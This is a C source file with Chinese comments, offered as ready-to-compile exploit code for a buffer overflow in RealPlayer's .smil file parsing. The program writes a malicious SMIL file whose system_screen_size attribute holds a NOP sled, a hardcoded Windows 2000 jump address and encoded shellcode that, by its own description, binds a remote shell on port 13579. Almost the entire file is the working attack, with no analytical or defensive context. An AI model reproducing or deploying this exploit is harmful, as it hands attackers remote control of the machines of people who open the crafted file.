1.cpp

RealPlayer .smil溢出漏洞攻击代码。直接编译可用。

//RealPlayer .smil溢出漏洞攻击代码
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char pre[] =
    "<smil>\n"
	"  <head>\n"
	"    <layout>\n"
	"      <region id=\"a\" top=\"5\" />\n"
	"    </layout>\n"
	"  </head>\n"
	"  <body>\n"
	"    <text src=\"1024_768.en.txt\" region=\"size\" system_screen_size=\"";

/*开13579端口，0x00, 0x90, 0xa0, 0x20, 0x0a, 0x0d, 0x3c, 0x3e, 
               0x2f, 0x5c, 0x22, 0x58, 0x3d, 0x3b 等字符受限制
*/
char shellcode[]= 
	//"\xeb\xfe" //debug
    "\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f"
	"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a"
	"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e"
	"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4"
	"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1"
	"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99"
	"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5"
	"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b"
	"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7"
	"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3"
	"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a"
	"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e"
	"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4"
	"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed"
	"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62"
	"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8"
	"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76"
	"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7"
	"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84"
	"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a"
	"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed"
	"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85"
	;

char end[]=
    "  </body>"
    "</smil>";

char system_screen_size[2000];

int main(int argc, char *argv[])
{
	//构造攻击文件
    FILE *fvuln;

    if(argc == 1)
    {     
        printf("Usage: %s <outputfile>\n", argv[0]);
        return 1;
    }


    fvuln = fopen(argv[1], "w");   
    memset(system_screen_size, 0x90, sizeof(system_screen_size)); //fill with nops   

    //跳到shellcoe执行
   	memcpy(system_screen_size + 1108,"\xeb\x06\xeb\x04", 4); 

	//2000下通用的jmp ebx地址
	memcpy(system_screen_size + 1112, "\x1b\x4a\xfa\x7f", 4);

	//真正的shellcode
  	memcpy(system_screen_size + 1116, shellcode, strlen(shellcode));     

    if(fvuln)
    {
        //Write file
        fprintf(fvuln, "%s%s\"/>\n%s", pre, system_screen_size, end);
        fclose(fvuln);
    }
    printf("File written.Binds a shell on port 13579.\n");

	return 0;
}